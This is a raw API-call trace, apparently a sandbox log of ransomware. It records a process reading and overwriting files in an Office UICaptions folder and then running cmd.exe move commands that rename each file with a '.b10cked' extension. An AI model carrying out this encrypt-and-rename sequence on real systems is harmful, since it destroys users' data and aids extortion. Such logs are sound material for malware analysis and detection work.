SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0153.170] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0153.170] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xc160 [0153.170] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0153.170] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0153.170] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xc160 [0153.170] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0153.170] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0153.170] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xc160 [0153.170] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0153.170] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0153.170] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: 
lpDistanceToMoveHigh=0x12ed00*=0) returned 0xc160 [0153.170] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0153.170] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0153.170] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xc160 [0153.170] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0153.170] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0153.170] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xc160 [0153.170] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0153.171] SetFilePointer (in: hFile=0x114, lDistanceToMove=-1256, lpDistanceToMoveHigh=0x12ecec*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0xbc78 [0153.171] ReadFile (in: hFile=0x114, lpBuffer=0x12ed94, nNumberOfBytesToRead=0x4e8, lpNumberOfBytesRead=0x12ed2c, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesRead=0x12ed2c*=0x4e8, lpOverlapped=0x0) returned 1 [0153.184] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecec*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x0 [0153.184] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0153.185] SetFilePointer (in: 
hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0xc160 [0153.185] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0153.185] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0153.185] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0153.185] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0xc160 [0153.185] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0153.185] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0153.185] ReadFile (in: hFile=0x114, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x60af, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x60af, lpOverlapped=0x0) returned 1 [0153.194] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0153.194] WriteFile (in: hFile=0x114, lpBuffer=0x14849d8*, nNumberOfBytesToWrite=0x60af, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x14849d8*, lpNumberOfBytesWritten=0x12ec1c*=0x60af, lpOverlapped=0x0) returned 1 [0153.194] SetFilePointer (in: hFile=0x114, lDistanceToMove=-24751, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x60b1 [0153.194] ReadFile (in: 
hFile=0x114, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x60af, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x60af, lpOverlapped=0x0) returned 1 [0153.195] SetFilePointer (in: hFile=0x114, lDistanceToMove=-24751, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x60b1 [0153.195] WriteFile (in: hFile=0x114, lpBuffer=0x14849d8*, nNumberOfBytesToWrite=0x60af, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x14849d8*, lpNumberOfBytesWritten=0x12ec1c*=0x60af, lpOverlapped=0x0) returned 1 [0153.200] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MOR6INT.REST.trx_dll", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0153.200] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MOR6INT.REST.trx_dll", cchWideChar=20, lpMultiByteStr=0x1328744, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MOR6INT.REST.trx_dll", lpUsedDefaultChar=0x0) returned 20 [0153.200] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0xc160 [0153.200] WriteFile (in: hFile=0x114, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0153.200] CloseHandle (hObject=0x114) returned 1 [0153.202] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\MOR6INT.REST.trx_dll", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\MOR6IN~1.TRX") returned 0x3c [0153.202] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All 
Users\\Microsoft\\OFFICE\\UICaptions\\1036\\", lpszShortPath=0x1273ccc, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\") returned 0x30 [0153.203] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\MOR6IN~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\MOR6INT.REST.trx_dll.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\MOR6IN~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\MOR6INT.REST.trx_dll.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x110, hThread=0x114, dwProcessId=0xe20, dwThreadId=0xeac)) returned 1 [0153.232] CloseHandle (hObject=0x110) returned 1 [0153.232] CloseHandle (hObject=0x114) returned 1 [0153.232] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\", cchLength=0x34 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\1036\\") returned 0x34 [0153.232] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\", cchLength=0x34 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\1036\\") returned 0x34 [0153.233] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\1036\\", cchCount1=52, lpString2="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\1036\\", cchCount2=52) returned 
2 [0153.233] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0153.233] ReleaseMutex (hMutex=0xf8) returned 1 [0153.233] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0153.233] ReleaseMutex (hMutex=0xf8) returned 1 [0153.233] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0153.233] ReleaseMutex (hMutex=0xf8) returned 1 [0153.233] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0153.233] ReleaseMutex (hMutex=0xf8) returned 1 [0153.233] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\MSOINTL.DLL.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\1036\\msointl.dll.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x114 [0153.255] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0153.255] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x17960 [0153.255] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0153.255] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=21004443505) returned 1 [0153.255] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0153.255] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x17960 [0153.255] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, 
dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0153.255] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0153.255] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x17960 [0153.255] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0153.256] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0153.256] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x17960 [0153.256] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0153.256] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0153.256] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x17960 [0153.256] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0153.256] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0153.256] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x17960 [0153.256] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, 
lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0153.256] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0153.256] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x17960 [0153.256] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0153.256] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0153.256] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x17960 [0153.256] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0153.256] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0153.256] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x17960 [0153.256] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0153.256] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0153.256] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x17960 [0153.256] SetFilePointer (in: 
hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0153.256] SetFilePointer (in: hFile=0x114, lDistanceToMove=-1256, lpDistanceToMoveHigh=0x12ecec*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x17478 [0153.256] ReadFile (in: hFile=0x114, lpBuffer=0x12ed94, nNumberOfBytesToRead=0x4e8, lpNumberOfBytesRead=0x12ed2c, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesRead=0x12ed2c*=0x4e8, lpOverlapped=0x0) returned 1 [0153.272] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecec*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x0 [0153.272] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0153.272] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x17960 [0153.272] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0153.272] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0153.272] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0153.273] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x17960 [0153.273] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0153.273] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, 
dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0153.273] ReadFile (in: hFile=0x114, lpBuffer=0x14849d8, nNumberOfBytesToRead=0xbcaf, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x14849d8*, lpNumberOfBytesRead=0x12ec08*=0xbcaf, lpOverlapped=0x0) returned 1 [0153.314] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0153.314] WriteFile (in: hFile=0x114, lpBuffer=0x14849d8*, nNumberOfBytesToWrite=0xbcaf, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x14849d8*, lpNumberOfBytesWritten=0x12ec1c*=0xbcaf, lpOverlapped=0x0) returned 1 [0153.315] SetFilePointer (in: hFile=0x114, lDistanceToMove=-48303, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0xbcb1 [0153.315] ReadFile (in: hFile=0x114, lpBuffer=0x14849d8, nNumberOfBytesToRead=0xbcaf, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x14849d8*, lpNumberOfBytesRead=0x12ec08*=0xbcaf, lpOverlapped=0x0) returned 1 [0153.317] SetFilePointer (in: hFile=0x114, lDistanceToMove=-48303, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0xbcb1 [0153.317] WriteFile (in: hFile=0x114, lpBuffer=0x14849d8*, nNumberOfBytesToWrite=0xbcaf, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x14849d8*, lpNumberOfBytesWritten=0x12ec1c*=0xbcaf, lpOverlapped=0x0) returned 1 [0153.322] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSOINTL.DLL.trx_dll", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0153.322] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSOINTL.DLL.trx_dll", cchWideChar=19, lpMultiByteStr=0x1328744, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: 
lpMultiByteStr="MSOINTL.DLL.trx_dll", lpUsedDefaultChar=0x0) returned 19 [0153.322] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0x17960 [0153.322] WriteFile (in: hFile=0x114, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0153.323] CloseHandle (hObject=0x114) returned 1 [0153.324] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\MSOINTL.DLL.trx_dll", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\MSOINT~1.TRX") returned 0x3c [0153.325] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\", lpszShortPath=0x1273ccc, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\") returned 0x30 [0153.325] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\MSOINT~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\MSOINTL.DLL.trx_dll.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\MSOINT~1.TRX\" 
\"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\MSOINTL.DLL.trx_dll.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x110, hThread=0x114, dwProcessId=0xe48, dwThreadId=0xfe0)) returned 1 [0153.327] CloseHandle (hObject=0x110) returned 1 [0153.327] CloseHandle (hObject=0x114) returned 1 [0153.327] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\", cchLength=0x34 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\1036\\") returned 0x34 [0153.327] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\", cchLength=0x34 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\1036\\") returned 0x34 [0153.327] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\1036\\", cchCount1=52, lpString2="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\1036\\", cchCount2=52) returned 2 [0153.327] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0153.327] ReleaseMutex (hMutex=0xf8) returned 1 [0153.327] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0153.327] ReleaseMutex (hMutex=0xf8) returned 1 [0153.327] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0153.328] ReleaseMutex (hMutex=0xf8) returned 1 [0153.328] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0153.328] ReleaseMutex (hMutex=0xf8) returned 1 [0153.328] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\MSOINTL.REST.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\1036\\msointl.rest.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, 